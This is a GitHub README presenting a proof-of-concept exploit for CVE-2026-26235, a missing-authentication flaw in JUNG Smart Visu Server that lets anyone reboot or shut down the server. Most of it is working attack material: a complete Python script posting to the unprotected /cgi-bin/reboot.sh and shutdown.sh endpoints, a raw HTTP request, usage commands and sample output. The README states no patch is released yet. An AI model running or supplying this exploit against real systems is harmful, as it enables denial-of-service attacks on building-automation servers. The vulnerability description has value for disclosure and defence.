
## 👤 Author

**Mohammed Idrees Banyamer**
- 📍 **Country:** Jordan
- 📸 **Instagram:** [@banyamer_security](https://instagram.com/banyamer_security)
  
---
![Python](https://img.shields.io/badge/python-3.6%2B-blue)
![Version](https://img.shields.io/badge/JUNG%20Smart%20Visu%20Server-%3C%3D1.1.1050-red)
![CVE](https://img.shields.io/badge/CVE-2026--26235-brightgreen)
![CVSS](https://img.shields.io/badge/CVSS-8.7-high)
![CWE](https://img.shields.io/badge/CWE-306-orange)
![Author](https://img.shields.io/badge/Author-@banyamer_security-orange)

**Proof-of-Concept exploit for CVE-2026-26235** - Unauthenticated Denial of Service via missing authentication in **JUNG Smart Visu Server ≤ 1.1.1050**.

---

## 🚨 Vulnerability Description

**CVE-2026-26235** is an unauthenticated denial of service vulnerability in **JUNG Smart Visu Server** versions ≤ 1.1.1050. The product fails to implement authentication for critical system management functions, allowing remote attackers to reboot or shut down the server with a single POST request.

The endpoints `/cgi-bin/reboot.sh` and `/cgi-bin/shutdown.sh` are exposed without any authentication checks. No session tokens, API keys, or credentials are required to trigger these system-level commands.

This allows:
- **Unauthenticated system reboot/shutdown**
- **No user interaction required**
- **Complete service disruption**
- **Persistent denial of service**

---

## 🎯 Affected Versions

| Status | Version |
|--------|---------|
| ❌ **Vulnerable** | JUNG Smart Visu Server ≤ 1.1.1050 |
| ✅ **Patched** | Not yet released |

**Tested on:** JUNG Smart Visu Server 1.1.1050, Embedded Linux

---

## 💥 Impact

| Vector | Description |
|--------|-------------|
| **CVSS v4** | 8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N |
| **Authentication** | None - Completely unauthenticated |
| **Attack Vector** | Network |
| **Complexity** | Low |
| **Impact** | High Availability Impact |

---

## 🔬 Technical Details

### Root Cause
1. **Missing authentication** - CWE-306: The product does not perform any authentication for critical system functions
2. **Exposed CGI endpoints** - `/cgi-bin/reboot.sh` and `/cgi-bin/shutdown.sh` are publicly accessible
3. **No session validation** - No cookie, token, or credential verification occurs
4. **Direct system command execution** - CGI scripts execute system reboot/shutdown commands without privilege checks

### Vulnerability Flow
```
Attacker → POST /cgi-bin/reboot.sh → No Authentication Check → System Reboot → DoS
Attacker → POST /cgi-bin/shutdown.sh → No Authentication Check → System Shutdown → DoS
```

---

## 🛠️ Proof of Concept

### Python Exploit Script
```python
#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server - Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)

if __name__ == "__main__":
    main()
```

### Raw HTTP Request
```http
POST /cgi-bin/reboot.sh HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Origin: http://192.168.1.100:8080
Referer: http://192.168.1.100:8080/
DNT: 1
Sec-GPC: 1
Content-Length: 0

```

---

## 📦 Installation

```bash
git clone https://github.com/banyamer-security/CVE-2026-26235.git
cd CVE-2026-26235
pip install requests
chmod +x CVE-2026-26235.py
```

---

## 🚀 Usage

### Basic Reboot
```bash
python3 CVE-2026-26235.py https://192.168.1.100:8080
```

### Shutdown
```bash
python3 CVE-2026-26235.py https://192.168.1.100:8080 -a shutdown
```

### Disable SSL Verification
```bash
python3 CVE-2026-26235.py https://smartvisu.local -k
```

### Custom Timeout
```bash
python3 CVE-2026-26235.py https://192.168.1.100:8080 -t 15
```

### Help
```bash
python3 CVE-2026-26235.py -h
```

### Expected Output
```
============================================================
 JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC
 CVE-2026-26235 | CWE-306
============================================================

[*] Starting exploit against: https://192.168.1.100:8080

[*] Target      : https://192.168.1.100:8080/cgi-bin/reboot.sh
[*] Action      : REBOOT
[*] SSL Verify  : False
[*] Sending unauthenticated POST request...

[+] Request sent successfully!
[+] HTTP Status : 200
[!] Server responded with 200 OK - action likely executed

[!] If successful, the target server should now be restarting.
[+] Exploit completed successfully.
```

---

## 📚 References

- [VulnCheck Advisory](https://www.vulncheck.com/advisories/jung-smart-visu-server-jung-smart-visu-server-missing-authentication)
- [Zero Science Lab - ZSL-2026-5971](https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5971.php)
- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)
- [NVD - CVE-2026-26235](https://nvd.nist.gov/vuln/detail/CVE-2026-26235) (pending)

---

## 👤 Author

**Mohammed Idrees Banyamer**
- 📍 **Country:** Jordan
- 📸 **Instagram:** [@banyamer_security](https://instagram.com/banyamer_security)
- 🐙 **GitHub:** [banyamer-security](https://github.com/banyamer-security)
- 🔗 **LinkedIn:** [Mohammed Banyamer](https://linkedin.com/in/banyamer)
- 📧 **Email:** banyamer.security@protonmail.com

---

## ⚠️ Disclaimer

This proof-of-concept exploit is provided **for educational and authorized security testing purposes only**. The author is **not responsible** for any misuse or damage caused by this software. 

**Unauthorized testing against systems you do not own or have explicit permission to test is illegal.**

---

## 📄 License

MIT License

Copyright (c) 2026 Mohammed Idrees Banyamer

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

---

## ⭐ Support

If this exploit helped your research or testing:
- ⭐ **Star** this repository
- 🔁 **Share** with other researchers
- 📢 **Follow** [@banyamer_security](https://instagram.com/banyamer_security) on Instagram

---

<p align="center">
  <i>Responsible Disclosure • Security Research • CVE-2026-26235</i>
</p>
